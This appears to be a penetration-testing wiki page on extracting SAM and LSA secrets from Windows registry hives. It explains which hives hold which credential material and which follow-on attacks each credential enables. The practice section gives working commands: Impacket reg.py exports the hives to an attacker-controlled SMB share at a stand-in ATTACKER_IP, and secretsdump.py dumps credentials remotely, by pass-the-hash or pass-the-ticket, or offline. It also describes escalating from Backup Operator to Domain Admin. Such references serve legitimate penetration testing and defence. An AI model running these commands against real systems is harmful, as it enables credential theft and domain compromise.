Skip to content

SAM & LSA secrets

Theory

In Windows environments, passwords are stored in a hashed format in registry hives like SAM (Security Account Manager) and SECURITY.

HiveDetailsFormat or credential material
SAMstores locally cached credentials (referred to as SAM secrets)LM or NT hashes
SECURITYstores domain cached credentials (referred to as LSA secrets)Plaintext passwords, LM or NT hashes, Kerberos keys (DES, AES), Domain Cached Credentials (DCC1 and DCC2), Security Questions (L$SQSA<SID>),
SYSTEMcontains enough info to decrypt SAM secrets and LSA secretsN/A

SAM and LSA secrets can be dumped either locally or remotely from the mounted registry hives. These secrets can also be extracted offline from the exported hives. Once the secrets are extracted, they can be used for various attacks, depending on the credential format.

Credential materialSubsequent attacks
Plaintext passwordscredential spraying, stuffing, shuffling or silver tickets
LM and NT hashescredential spraying, stuffing, shuffling, cracking, pass-the-hash
Kerberos keys (RC4, i.e. == NT hash)credential cracking, overpass-the-hash or silver tickets
Kerberos keys (DES, AES)credential cracking, pass-the-key or silver tickets
Domain Cached Credentials (DCC1 or DCC2)credential cracking

Practice

Exfiltration

Impacket's reg.py (Python) script can also be used to do the same operation remotely for a UNIX-like machine. For instance, this can be used to easily escalate from a Backup Operator member to a Domain Admin by dumping a Domain Controller's secrets and use them for a DCSync.

The attacker can start an SMB server, and indicate an UNC path including his IP address so that the hives get exported directly to his server.

bash
# start an SMB share
smbserver.py -smb2support "someshare" "./"

# save each hive manually
reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SAM' -o '\\ATTACKER_IPs\someshare'
reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SYSTEM' -o '\\ATTACKER_IP\someshare'
reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SECURITY' -o '\\ATTACKER_IP\someshare'

# backup all SAM, SYSTEM and SECURITY hives at once
reg.py "domain"/"user":"password"@"target" backup -o '\\ATTACKER_IP\someshare'

Secrets dump

Here are some examples and tools that can be used for local/remote/offline dumping.

Impacket's secretsdump (Python) can be used to dump SAM and LSA secrets, either remotely, or from local files. For remote dumping, several authentication methods can be used like pass-the-hash (LM/NTLM), or pass-the-ticket (Kerberos).

bash
# Remote dumping of SAM & LSA secrets
secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'

# Remote dumping of SAM & LSA secrets (pass-the-hash)
secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'

# Remote dumping of SAM & LSA secrets (pass-the-ticket)
secretsdump.py -k 'DOMAIN/USER@TARGET'

# Offline dumping of LSA secrets from exported hives
secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL

# Offline dumping of SAM secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL

# Offline dumping of SAM & LSA secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL

Secretsdump (Impacket) and NetExec both extract security questions, if any, from the LSA. They are json formatted, UTF-16-LE encoded, and hex encoded on top of that.

Resources

http://moyix.blogspot.com/2008/02/syskey-and-sam.html

http://moyix.blogspot.com/2008/02/decrypting-lsa-secrets.html

https://medium.com/@benichmt1/secretsdump-demystified-bfd0f933dd9b

https://webstersprodigy.net/2014/02/03/mscash-hash-primer-for-pentesters/